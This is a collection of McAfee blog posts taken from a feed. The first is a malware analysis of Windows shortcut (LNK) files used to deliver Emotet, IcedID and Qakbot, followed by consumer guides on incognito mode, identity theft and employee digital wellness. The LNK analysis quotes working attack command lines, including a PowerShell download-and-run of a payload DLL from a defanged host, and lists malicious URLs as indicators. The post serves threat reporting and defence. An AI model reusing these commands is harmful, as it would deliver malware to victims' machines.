An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

Figure 1 – Apr to May month geolocation of the LNK attacks
Figure 1 – Apr to May month geolocation of the LNK attacks

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

Figure 2 _ LNK files as seen by a normal user
Figure 2 _ LNK files as seen by a normal user

LNK THREAT ANALYSIS & CAMPAIGNS

With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.

 

EMOTET

Infection-Chain

Figure 3 _Emotet delivered via LNK file Infection-Chain
Figure 3 _Emotet delivered via LNK file Infection-Chain

Threat Analysis

Figure 4 _ Email user received having malicious LNK attached
Figure 4 _ Email user received having malicious LNK attached

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

Figure 5 _Properties of Emotet LNK sample
Figure 5 _Properties of Emotet LNK sample

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Figure 6 _ Contents of Emotet LNK file
Figure 6 _ Contents of Emotet LNK file

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.

ICEDID

Infection-Chain

Figure 7 _ IcedID delivered via LNK file Infection-Chain
Figure 7 _ IcedID delivered via LNK file Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties

Figure 8 _ Properties of IcedID LNK sample
Figure 8 _ Properties of IcedID LNK sample

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcalle[.]com/listbul.exe

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.

QAKBOT

Infection-Chain

Figure 9 _ Qakbot delivered via LNK file Infection-Chain
Figure 9 _ Qakbot delivered via LNK file Infection-Chain

Threat Analysis

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.

Figure 10 _ Properties of Qakbot LNK sample
Figure 10 _ Properties of Qakbot LNK sample

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.

CONCLUSION

As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type SHA-256 Scanner  
Emotet LNK 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 WSS LNK/Emotet-FSE
IcedID LNK 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 WSS LNK/Agent-FTA

Suspicious ZIP!lnk

Qakbot LNK b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 WSS LNK/Agent-TSR

 

URLs (Uniform Resource Locator) hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/

hxxp://filmmogzivota[.]rs/SpryAssets/gDR/

hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/

hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/

hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/

hxxps://hectorcalle[.]com/093789.hta

hxxps://hectorcalle[.]com/listbul.exe

hxxps://green-a-thon[.]com/LosZkUvr/B.png

WebAdvisor All URLs Blocked

 

The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

]]>
What Is Incognito Mode and How Safe Is It? https://www.mcafee.com/blogs/tips-tricks/what-is-incognito-mode-and-how-safe-is-it/ Mon, 20 Jun 2022 19:04:22 +0000 https://www.mcafee.com/blogs/?p=151123

The internet makes it easy to get a lot done, but not all of it needs to be public. That’s...

The post What Is Incognito Mode and How Safe Is It? appeared first on McAfee Blog.

]]>

The internet makes it easy to get a lot done, but not all of it needs to be public. That’s where incognito mode comes in, letting you hide your search history from others who are using your internet-connected device. For example, imagine searching online for “ideas for a surprise birthday party.” You wouldn’t want the guest of honor to see that if they use your shared computer!  

What most people don’t realize, though, is that incognito mode or private browsing isn’t really private. If you want to have a private browsing session, it helps to understand what incognito mode does and doesn’t do. 

In this article, we’ll explain what incognito mode is, how to turn it on using different search engines and mobile devices, and why a VPN like McAfee Secure VPN might be a better option for safeguarding your privacy. 

What is incognito mode?

When you search the internet, your web browser automatically saves the history of your searches. In incognito mode, however, it deletes this information when you end the session.  

Google Chrome coined “incognito mode,” so the term is pretty popular. Other web browsers might refer to it differently. For example, Firefox calls it “private mode,” while Safari uses the term “private browsing.”  

What does incognito mode hide?

When you search the internet in private browsing mode, your browser won’t save the history of the websites once you close all of the incognito tabs. This deleted information might include: 

  • Browsing history, which is a list of the websites you recently visited 
  • Cookies, which are small files websites use to remember you and your login information 
  • Site data, which is information entered on a website’s forms 

What browsing history data is visible with incognito mode?

Incognito mode can be super convenient but, as we said, it’s not really private. While it’s true that anyone using your device won’t be able to view your history, your browsing can still be viewed by outside eyes, like:  

  • Internet service providers (ISP): The company that provides your internet service knows every site you’ve visited. If they receive a subpoena from law enforcement, they’ll have to turn over that data. 
  • Websites: Even if you’re in incognito mode, your ISP shares your internet protocol (IP) address with the websites you visit. The IP address is a unique number that identifies an internet-enabled device. Anyone with your IP address can determine the city, or possibly the neighborhood, where you live. The only way to conceal your IP address when browsing is to use a virtual private network like McAfee Secure VPN. 
  • School or company networks: If you use a network run by your school or employer, they can see your browsing history even if you’re in incognito mode. 
  • Websites you log into: When you’re in incognito mode and log into a website like Twitter, you won’t be anonymous. The site can also share your data with other websites. 

How to turn on incognito mode

Every major browser and mobile device has a type of private browsing. Here’s how to access incognito mode in a few different ways. 

Private browsing in Google Chrome

It’s easy to launch a search in incognito mode in Google Chrome. Just follow these steps:  

  1. Open the Chrome browser on your device. 
  2. Click the three vertical dots in the upper-right corner of the window. 
  3. Select “New Incognito Window.”  
  4. Or use a keyboard shortcut: In Windows, Linux, or Chrome, press Ctrl + Shift + N. On a Mac, press ⌘ + Shift + N. 

You’ll know you’re in Chrome’s incognito mode by the black background and spy icon on the homepage. Here, Chrome reminds you of what incognito mode will and won’t do.  

There is also a toggle to block third-party cookies. When you visit different websites while in incognito mode, websites can track your movement. They might use that data to target ads based on your search history. When you enable third-party cookie blocking, it stops sites from sharing cookies and data. 

Private browsing on your Android device

Here’s how to set it up in the Google Chrome browser for your Android (note that the Google Chrome app is the default browser for most Android phones): 

  1. Open Chrome. 
  2. Tap the three dots at the top-right corner of the screen. 
  3. Tap “New incognito tab.” This will open up a new incognito window. 
  4. Close the incognito window to end the incognito session. 

Remember, for Google Chrome’s incognito mode to do the trick, you need to close your browsing session after each use. If you leave the tab open and someone else uses your phone, they can see your activity. 

Private browsing in Mozilla Firefox

What Chrome calls “incognito mode,” Mozilla Firefox refers to as “private browsing.” There are a couple of ways to launch a private window using the steps below: 

  1. Open Mozilla on your browser. 
  2. Click the three horizontal lines in the top-right corner. 
  3. Select “New Private Window.” 
  4. Or use the keyboard shortcut Ctrl + Shift + P in Windows. On a Mac, press Command + Shift + P. 

The private browsing window has a dark-purple background and a mask icon. This homepage also describes the limitations of private browsing. 

With its Enhanced Tracking Protection, Firefox blocks third-party tracking across sites. This is a default protection on Firefox, so cookies are blocked across sites no matter which privacy setting a user chooses. 

Private browsing in Apple Safari

Apple’s Safari was the first to introduce private browsing for Apple devices in 2005. Users have a couple of ways to open a private window on a Mac or an iOS device. They include: 

  1. Go to the File menu and select “New Private Window.” 
  2. The keyboard shortcut is to hold down Command + Shift + N. 
  3. On an iPhone, open Safari. Tap the “Tabs” button (the two squares on the lower right). Tap “Private.” Tap “Done.” 

Your sign that you’re in a private browser window is a dark gray search bar. Like Firefox, Safari lets you block third-party tracking (you’ll just need to adjust your settings to do so). Choose Safari on your Mac. Go to “Preferences” and click “Privacy.” Then, select “Prevent cross-site tracking.” 

Private browsing on your iPhone

For iPhones, the default browser is Safari. Here’s how to set up private browsing in Safari for your iPhone: 

  1. Open Safari. 
  2. Tap the tab icon at the bottom right of the screen (it looks like two overlapping squares). 
  3. Tap “private” at the bottom-left of the screen. 
  4. To exit private mode, tap “private” again. 

Remember to close your browser’s private tabs when you’re done surfing. This makes sure that cookies are deleted and the private session is safely hidden from your device’s history. 

Why do people use incognito mode?

Doing a private search that erases your browsing history can be useful in certain situations. Because some cookies are deleted at the end of your search, you’ll see fewer ads than in a normal search.  

If there’s something you don’t want to keep in your browser history, like shopping for a gift for a relative, an incognito search can keep your activity private.  

It’s also a good idea to use incognito mode when using a public device or a borrowed computer to protect your data.  

Incognito mode is even helpful if you want to do a search that’s not influenced by your browsing history or to see your blog or website from a fresh perspective. 

Is incognito mode safe?

The terms “private search” and “incognito mode” sound great. But while your history is erased on your device, it’s still visible to the outside world. Even when you’re in incognito mode, websites, your ISP, and your network can still see your IP address and browsing history. 

Not to mention, it won’t delete any files you download, like malicious software. While someone using your device won’t be able to see your browsing history, incognito mode won’t be able to stop hackers and identity thieves in their tracks. 

If you really want to hide your computer’s IP address and browse privately while keeping your data safe, it’s a good idea to look into a VPN service, like McAfee Secure VPN. With our smart VPN, you can browse confidently and stay anonymous from advertisers and prying eyes. You’ll also benefit from bank-grade encryption and automatic protection on unsecured networks.  

Browse online confidently

If your goal is to keep prying eyes out of your browsing history, incognito browsing might not be enough. Use a McAfee Secure VPN for worry-free browsing.  

For added security, though, upgrade to McAfee Total Protection Ultimate and enjoy antivirus protection, identity monitoring, and more! 

The post What Is Incognito Mode and How Safe Is It? appeared first on McAfee Blog.

]]>
10 Ways to Protect Your Identity https://www.mcafee.com/blogs/privacy-identity-protection/10-ways-to-protect-your-identity/ Sun, 19 Jun 2022 13:04:55 +0000 https://www.mcafee.com/blogs/?p=133402

We’re online more than ever, in large part because it allows us to take advantage of online conveniences like bill...

The post 10 Ways to Protect Your Identity appeared first on McAfee Blog.

]]>

We’re online more than ever, in large part because it allows us to take advantage of online conveniences like bill pay and booking appointments. But these many benefits might also leave us exposed to risks, like identity theft.

Identity theft is characterized by one person using another’s personal or financial data for their benefit. Cybercriminals may take information like a person’s name, birthday, Social Security number, driver’s license number, home address, and bank account information and use it for their benefit. A name and matching financial information, for instance, can be used to apply for credit cards or open new accounts.

The good news is that you can safeguard yourself and your family with some best practices — allowing you to enjoy your best life online and worry less about cybercriminals. Share these 10 tips with your family to help keep your entire household safe.

Password-protect your devices with strong passwords

A good habit to get into is to password-protect your computer, tablet, and mobile devices through unique, strong passwords. These devices are home to some of your most sensitive information, including everything from emails to apps that connect to your bank accounts. So, if these devices fall into the wrong hands, a password makes it harder to access your personal data.

Take some time to come up with your passwords, though. It’s important to create strong passwords that hackers can’t guess. A strong password will include a mix of symbols, numbers, and letters. Steer clear of simple passwords like “123456” (it might seem obvious, but this is one of the most common passwords people use). Also, avoid including information that other people can guess, like your birthdate, home address, or name.

Don’t forget to use different passwords for different accounts. If you use the same password across multiple accounts, and a fraudster gains access to one account, they may access the others. Fortunately, McAfee’s identity protection services include a password manager, which can help secure your account credentials across multiple devices. This tool encrypts passwords, storing them safely and making it easy to keep track of them.

Learn how to identify and avoid phishing scams

Identity thieves are skilled at leveraging new technologies. Phishing is one great example of this. Phishing involves criminals masquerading as trustworthy entities, such as government agencies or banks, and using this trusted position to get sensitive information. Phishing scams started with traditional mail. They’re now also done via phone, text, and email.

As a general rule of thumb, never give out any personal information when contacted by a business, bank, or another entity. Also, make sure your email spam filters detect phishing attempts. Never open emails from people you don’t know, and don’t download email attachments without knowing what they are. Some phishing emails include malware, which can infiltrate your device and access personal data. A McAfee Total Protection plan is an all-in-one protection solution that can help you detect and avoid malware.

Fraudulent websites may also use phishing techniques. A website may look similar to the legitimate website of a mortgage lender, bank, or credit card company but might be a fraudulent platform seeking to get information from consumers. Always verify that any website you visit is the legitimate website of the institution, and consider McAfee antivirus software, which offers a safe browsing solution.

Set up alerts through your bank

When financial identity theft occurs, this can also impact financial institutions like banks and lenders. So, they’re eager to prevent fraud, as well. One way they do this is through fraud alerts. You can set up your online banking to issue fraud alerts — for example, via an email, text message, or phone call — if your bank suspects suspicious activity on your account.

In some cases, a bank will also freeze your account until you verify whether the activity is legitimate. This is a common tactic used to protect against credit card fraud. Geo-control is one example: If you live in the U.S., but a German IP address uses your credit card, your credit card provider will likely issue an alert. You can also set up alerts for certain transaction amounts or types.

Review your credit report regularly

Your credit report is one of the most powerful tools you have at your disposal for catching identity thieves and stopping them in their tracks. You’re entitled to a free credit report every 12 months via AnnualCreditReport.com, an initiative of the Federal Trade Commission (FTC). You can get a free copy of your report from each major credit bureau: Experian, Equifax, and TransUnion.

Review your report thoroughly, checking for inaccuracies. When credit monitoring, check your:

  • Personal information: Verify that your name, address, phone number, birthdate, Social Security number, and employment details are correct.
  • Accounts: Confirm that all accounts listed are yours and current. Keep an eye out for unrecognized credit cards, utility accounts, phone accounts, or streaming accounts.
  • Public records: Check for foreclosures, civil suits, liens, or bankruptcies. If these issues are on your credit report and you don’t recognize them, you might be affected by identity fraud.

 

If you find any discrepancies, contact the appropriate credit reporting company. You should also contact the relevant financial institution and visit IdentityTheft.gov. You can report the suspected identity theft and find resources to help you recover.

Be mindful of what you share on social media

Social media is great for connecting with others online, but it does open the door to some vulnerabilities. Be careful about what you post, and steer clear of sharing personal details like your home address, children’s names, pet’s names, or birthdays, which some people use as passwords. If a social media platform offers two-factor authentication, opt in.

Images are another touchy subject. Never post photos that include private data, like a picture of your passport or vaccine card. Consider what’s in the background of any photos — from your home (with a house number) to mail with your address. Finally, you may want to set your visibility to private on all social media accounts, limiting who can view them. And even if your account is private, you should still follow the above tips.

Shred sensitive documents

Some identity thieves get people’s personal information by dumpster diving. One solution? Invest in a paper shredder. You’ll be able to shred documents into tiny bits that are hard to piece together, making it that much harder for someone else to piece together any personal information they contain.

Here are some documents worth shredding:

  • Debit card statements, credit card statements, and bank statements that contain personal financial information
  • Invoices or receipts containing details like financial account numbers
  • Documents containing your Social Security number, like pay stubs and work contracts
  • Junk mail with contact information, like your name and address
  • Old photos and IDs, which people can use to create fake IDs
  • Shipping labels, like those you might get from online retailers to make returns
  • Medical records or receipts, which may contain insurance information
  • Canceled checks

If you’re not sure whether something needs to be shredded, go ahead and destroy it. It only takes seconds, and you’re better off safe than sorry.

Protect all of your devices with antivirus software

Whether you use a computer, tablet, or mobile device for many of your online activities, like paying bills, these devices contain a lot of personal data. So, it’s good to protect them from hackers. ​​Install antivirus software like McAfee’s to protect against viruses and spyware. It would be best if you also had a firewall, which is a network security system that controls the incoming and outgoing network traffic based on set security parameters.

To take your device security a step further, you may also want to invest in a virtual private network (VPN). This helps hide your online activity. It can safeguard against hackers on public networks but is also worth using at home. It hides details like browsing activity, personal data, and IP address from potential snoops. McAfee also offers VPN services.

Keep personal documents in a safe space

While your computer, tablet, or mobile device may hold a great deal of personal data, you likely also have hard copies of sensitive documents worth protecting. Documents like your birth certificate, Social Security card, and passport contain valuable information that identity thieves can use for personal gain, so you want to make sure they’re kept in a safe space.

Don’t simply shove these documents into your desk drawer. It’s best to keep them in a locked, fireproof home safe with a secure code. To keep things organized, put each document in a protective plastic sleeve and put the sleeves in a binder. This can be useful if you have a large family and need to keep track of everyone’s data.

Follow the news to learn about data breaches

Sophisticated hackers don’t just target individuals. They may also try to infiltrate businesses, government agencies, higher education institutions, health care facilities, and any other organization that gathers sensitive consumer information. If an entity is subject to a data breach, they’re legally required to notify any consumers who may have been impacted.

However, it’s still good to inform yourself about potential breaches that may affect you. Larger-scale data security risks are usually reported in the media. We also post about data breaches on the McAfee blog. If an entity you do business with has been affected, change your passwords and the passwords of any related accounts immediately.

Know the warning signs of identity theft

Knowing possible signs of identity theft can help you catch it early so that you can continue to enjoy your time online. Educate yourself and your family about these warning signs, ensuring everybody stays safe. Here are some possible indications identity thieves have targeted you:

  • You receive phone calls from debt collectors about accounts you aren’t familiar with. Don’t provide personal information over the phone immediately. Check your credit report to get the details about the debts in question.
  • Your credit score experiences unexplained changes. Get a copy of your credit report from the major credit reporting agencies to find out why.
  • Your bank accounts or credit cards have unknown charges you (and your family) can’t account for. Contact your financial institution to report the suspected fraud, providing relevant documentation to back up your claims. You can also report fraud to your local government.
  • You receive a fraud alert from your financial institution. Check any activity deemed potentially fraudulent as soon as possible.
  • You get mail addressed to another person’s name. This could include medical bills, W-2 forms related to unfamiliar employers, or credit card bills, for example. Follow up with the relevant institution.
  • You experience problems with your tax return For example, the Internal Revenue Service (IRS) may reject your filing if someone else has already filed in your name (to get your tax refund). Contact the IRS fraud department.

You’re only a step away from better protection

The internet keeps all of us connected, but that’s why identity theft protection is important. With people increasingly connected, doing more, and sharing more online, cybercriminals can pinpoint weaknesses and take advantage. Hackers are ready to leverage your information for personal gain, and identity theft is no exception.

McAfee is here to help. McAfee’s identity protection services provide 24/7 monitoring of your email addresses and bank accounts, providing up to $1 million worth of ID theft coverage. You deserve to enjoy the comfort offered by the internet without stressing about identity theft. Implement the best practices above in your household so that you and your loved ones can stay connected with confidence.

The post 10 Ways to Protect Your Identity appeared first on McAfee Blog.

]]>
What Is Identity Theft and How Do You Recover From It? https://www.mcafee.com/blogs/tips-tricks/what-is-identity-theft-and-how-do-you-recover-from-it/ Fri, 17 Jun 2022 18:47:07 +0000 https://www.mcafee.com/blogs/?p=151111

The internet is a big place. While it’s changed the world for the better — making our daily lives that...

The post What Is Identity Theft and How Do You Recover From It? appeared first on McAfee Blog.

]]>

The internet is a big place. While it’s changed the world for the better — making our daily lives that much easier! — it can also be a playground for cybercriminals who would love to get their hands on our personal information.  

When this happens, it can result in identity theft. While it can be scary to deal with, there are things you can do to protect yourself and recover from this type of cybercrime.  

In this article, we’ll tell you what identity theft is and how to recognize its various forms. We’ll also go over what you can do to bounce back after your identity has been taken.  

What is identity theft?

Life online presents so many cool opportunities, but it can also make us vulnerable to cybercriminals. But that doesn’t mean you need to get offline. A little knowledge can go a long way in keeping you safe. It all starts with understanding what identity theft is.  

Identity theft is when someone steals your personal or financial information to commit fraud or deception, typically for monetary gain. Depending on their goals, they might take a variety of information. Unfortunately, this is something most people will experience — either directly or indirectly — at some point in their lives. 

What makes identity theft really troublesome is that the consequences can go beyond just affecting your credit score. You might experience issues while trying to get jobs, see an increase in your auto insurance rate, get a surprise tax bill, and even find out you have a criminal record! Not to mention it can cost a lot of time and money to fix.  

Just as important as it is to understand what identity theft is, it’s also important to know the different types of identity theft so you can keep an eye out.  

Types of identity theft 

You work, play, and shop on the internet every day, but you shouldn’t let the fear of identity theft stop you from doing what you enjoy online. All it takes is a little information to outsmart online criminals — including knowing the different types of identity theft. They include: 

  • Financial identity theft: A thief will use your identity for their own financial gain. The cybercriminal might hack your bank account to steal funds or use your credit card for online shopping. If you have a good credit history, they might even use your identity to buy a home or rent an apartment.  
  • Medical identity theft: A thief will use your identity to secure medical services. With your health insurance information, they can get prescription drugs, buy medical equipment, or even pay for medical care and procedures. Whatever your insurance doesn’t pay for will then get billed to you.  
  • Criminal identity theft: This happens when a thief is busted for a crime and gives the arresting officer your information. The criminal might have stolen your actual ID or created a fake one, and you won’t know what’s happened until the crime shows up on your background check (or, worse, you get a court summons in the mail).  
  • Synthetic identity theft: A thief will use your identity to create a fake person. The new persona will have your birthdate, Social Security number, and address — but a different name. They can then use this persona to do things like apply for loans and get credit cards 
  • Child identity theft: A thief will use a child’s identity to commit fraud. Kids usually don’t have bank accounts or debt. The thief may use the child’s identity to do things like buy homes or get social benefits.  

How does identity theft happen?

How does an identity thief get your information? Any time you make a purchase, subscribe to a website, file a tax return, or do anything else online, you share your personal information. And some cybercriminals are pretty good at getting that information for themselves.  

Here are a few of the most common ways thieves can get access to your data 

  • Phishing scams: A thief might message you over email or social media pretending to be someone they’re not. They may claim to be calling on behalf of the Internal Revenue Service (IRS), a sweepstakes, or even a family member. After that, the criminal will ask for money or your personal information.  
  • Data breach: When you fill out webforms, open new accounts, or make purchases online, your personal information is likely saved in a company database. Most companies do their best to keep your information secure, but hackers are always hard at work trying to gain access to it. If the hackers can breach your information, they can sell it for a profit.  
  • Internet of Things (IoT): It’s not just computers that have internet access anymore. Hackers might also try to steal personal information from your smartphone, tablet, or another internet-compatible device. 
  • Social media: People share all kinds of personal information on social media. In addition to data like your birthday, address, and phone number, criminals can learn about your family members, pets, and interests. They can use this data as potential password information when they try to break into your online accounts. 
  • Physical theft: Some thieves are old-fashioned. A criminal can take your credit card, ID, smartphone, or computer and use it to steal your identity. If you throw away documents like paystubs or checks without shredding them first, criminals can use them to get your personal data, like your bank account numbers. 

What personal information is generally taken when identity theft occurs?

The type of information that hackers take during a breach can vary widely. It just depends on what information a company stores, what data the cybercriminal can access, and even the purpose of the attack. A hacker might be making a political statement or simply “showing off” their skills. 

During a breach, hackers target information that can be resold on the dark web or used for identity fraud, like debit card or credit card accounts. They might also collect data like people’s full names, email addresses, passwords, Social Security numbers, and driver’s license numbers. 

How to recover from identity theft

Dealing with identity theft can be stressful and a little bit scary, but we promise it’s not the end of the world. The important thing is to be quick about it and stay alert for signs of identity theft, like:  

  • A sudden dip in your credit score  
  • Mail addressed to your home with someone else’s name on it 
  • Calls from debt collectors about debts that aren’t yours 
  • Unexplained bills showing up at your home  

The good news is that if you’re ever the victim of identity theft, there are several things you can do to limit and reverse that damage. We’ll explore these steps in the next few sections. 

Contact the company where your information was stolen

Notify your credit card company, financial institution, or the business where the thief is using your data right away. For example, if the criminal is using your credit card number to buy clothing online, contact the store immediately. They’ll be able to stop any further purchases from being made.  

File a police report

Banks don’t like scams, either. Some banks may require you to show them a police report about your identity theft before they’ll refund any fraudulent charges or withdrawals. Call your local law enforcement office to report identity theft as soon as you can.  

Before speaking to an officer, though, take the time to go over all the information so you don’t leave anything out. Be as detailed as possible. Let the cops know how your sensitive information was used and what dates and times it was used. You may want to bring a copy of your bank statement as proof. 

Notify the three major credit bureaus 

One of the biggest pains about identity theft is that it can affect your credit score, which can affect your ability to do things like secure a business loan or buy a house. File a fraud alert with each of the three major credit bureausTransUnion, Equifax, and Experian — and let them know which activity on your credit report is false.  

File a report with the Federal Trade Commission

When you file a report with the Federal Trade Commission (FTC), they’ll create a free recovery plan for you to deal with your identity being stolen. The FTC is a government organization that protects the rights of consumers. You can get started by visiting IdentityTheft.gov 

Consider investing in a comprehensive security plan

The best time to deal with identity theft is before it happens. When you sign up for all-in-one protection, like McAfee Total Protection, you’ll get $1 million of identity theft protection insurance.  

We’ll also provide identity monitoring to help catch threats to your information before they get out of hand. You’ll also get access to our Secure VPN and our quality antivirus and safe browsing software to protect you from threats like malware 

Browse confidently with award-winning identity protection 

You deserve to live your life online and enjoy the internet the way it was meant to be. That’s where McAfee can help — making the digital world a safe place for you and your family! 

We’ve got your back when it comes to your online identity with our identity protection service. When you sign up, we’ll keep tabs on up to 60 unique types of personal data, including your financial information. We’ll also notify you up to 10 months sooner than similar services if it seems like your identity has been compromised. And on top of $1 million of ID theft coverage, you’ll receive hands-on restoration support to get your identity back.  

See how McAfee can help secure your personal information online and give you peace of mind.  What Is Identity Theft and How Do You Recover From It?

The post What Is Identity Theft and How Do You Recover From It? appeared first on McAfee Blog.

]]>
McAfee’s Digital Wellness Delivers Online Protection As An Employee Benefit https://www.mcafee.com/blogs/internet-security/mcafee-digital-wellness/ Wed, 15 Jun 2022 01:46:34 +0000 https://www.mcafee.com/blogs/?p=154909

The topic most top of mind today for HR professionals is keeping and acquiring great talent.  One of the most...

The post McAfee’s Digital Wellness Delivers Online Protection As An Employee Benefit appeared first on McAfee Blog.

]]>

The topic most top of mind today for HR professionals is keeping and acquiring great talent.  One of the most important elements of doing both is providing a desirable and meaningful set of employee benefits.   

Digital Wellness is a New Pillar in the Employee Benefits Space 

The idea of Digital Wellness isn’t exactly brand new, but the world we’ve lived in for the past few years has cemented it into one of the main pillars of employee benefits, joining the traditional big three of Financial, Mental and Physical Wellness.   

Employees Are Spending the Majority of Their Time Online 

One of the main reasons Digital Wellness has become essential is that so many people have had to both live and work exclusively online for an extended period of time – spending 8+ hours a day on personal things in addition to all those hours they spend working via the web. Things like banking, telehealth and shopping to name a few.  

  • 84% claim internet banking is the most important channel while interacting with their bank1
  • 75% have used telehealth services in the past 12 months2
  • 49% of consumers are buying online more3  and 41% of those are shopping daily or weekly via mobile or smartphone4

There’s almost no aspect of life that isn’t touched by the internet for most people, especially when adding their work environment into the mix.  

Remote Work Isn’t Going Away

In addition to all the regular life they live online, employees have become accustomed to working remotely, even if it’s just part of the time. 

  • 36.2 million workers are predicted to be working remotely by 2025 – an 87% increase from pre-pandemic levels5 
  • 59% of respondents in a study by Owl Labs said they would be more likely to choose an employer who offered remote work5
  • 32% said they would quit their job if they were not able to continue working remotely5 

With these kinds of stats, it’s hardly surprising that 74% of employers plan to maintain some sort of remote/hybrid workforce into the foreseeable future6   

Cybercriminals are Taking Full Advantage of All the Extra Traffic  

The digital world has become a veritable smorgasbord for hungry cyber criminals. In fact, there’s been a 400% increase in cybercrime just over the last couple of years7. To put it in perspective, here are a few sobering statistics that happen on a daily basis:  

  • 3 billion phishing emails are sent by scammers8 
  • 24,000 malicious mobile apps are blocked on average9
  • 6.85 million accounts are hacked10

Unfortunately, all this means that people are in a constant battle to protect themselves from cyber risk.  

When Employees are at Risk, Their Employers are at Risk 

With everyone going about their daily activities and working whenever and wherever they happen to be at the time, it’s probably no surprise that more than half of employees are using their personal devices for work11.  It’s just too convenient not to.  However, when you also realize that 95% of breaches are caused by human error12, this intersection between personal life and work-life becomes risky for both the employees and their employers.  It’s no wonder that companies with a large number of employees working remotely have seen a 24% increase in breaches since the pandemic began13. 

Cyber Risk has Placed Huge Financial Strains on Companies 

When companies’ networks are breached it causes their customers to be vulnerable, risking a huge blow to their reputation and invoking serious fines and penalties due to compliance failures.  And trying to get cyber insurance to protect against financial loss has become increasingly more difficult.  A recent article by the Wall Street Journal reported that cyber insurance premiums rose 92% in 2021 and the hoops companies have to jump through are much more stringent to be eligible for the coverage – things like providing cyber education and ensuring they’re taking stronger steps to protect their network and customer data14 

In addition to the direct financial impact of cyber threats, there’s also the loss of human capital.  It can take up to six months and up to 200 hours of a person’s time to address and correct identity theft15. If employees are focusing on digital healing, it’s a fair bet they’re not focusing as closely on their work. 

To Achieve Digital Wellness, Employees – and Their Employers, Need Two Things 

Preventative care is the first step toward Digital Wellness, and it consists of three, simple parts. 

  1. Knowledge is power as they say, so cyber education is key.  For example, if an employee can identify those 3 billion phishing emails sent daily, they are much less likely to be wooed into clicking on dangerous links, and if they understand how important it is to create strong and unique passwords, they can help protect themselves even if they’re found in a data breach. 
  2. Ward off threats by installing device protection to safeguard people’s access points to the internet. This means protecting all devices (PCs, Macs, smartphones, tablets, and smart home devices) against digital dangers like viruses/malware, unsecured network connections (thanks but no thanks, random coffeeshop Wi-Fi!), and spoofed/unsafe websites.  
  3. Take back control of employees’ privacy and data. How? It can be done by doing things like installing a virtual private network (VPN) that encrypts unsecured Wi-Fi networks to make them safe from prying eyes, proactively monitoring the dark web for identity breaches and by identifying and cleaning up all the unneeded profiles that have been piling up over the years. 

Restorative care is the second step in the Digital Wellness journey.  If a digital threat sneaks through even after all the careful preventive care, it’s important to quickly remedy the situation. 

  1. Kick uninvited cyber criminals out as soon as they’ve been discovered by removing viruses, malware, ransomware, etc. from each infected device as rapidly as possible.  
  2. Identity stolen? Do a credit freeze then work on restoring your reputation by combating things like fraudulent unemployment claims, unauthorized lines of credit and unlawful home title transfers. 
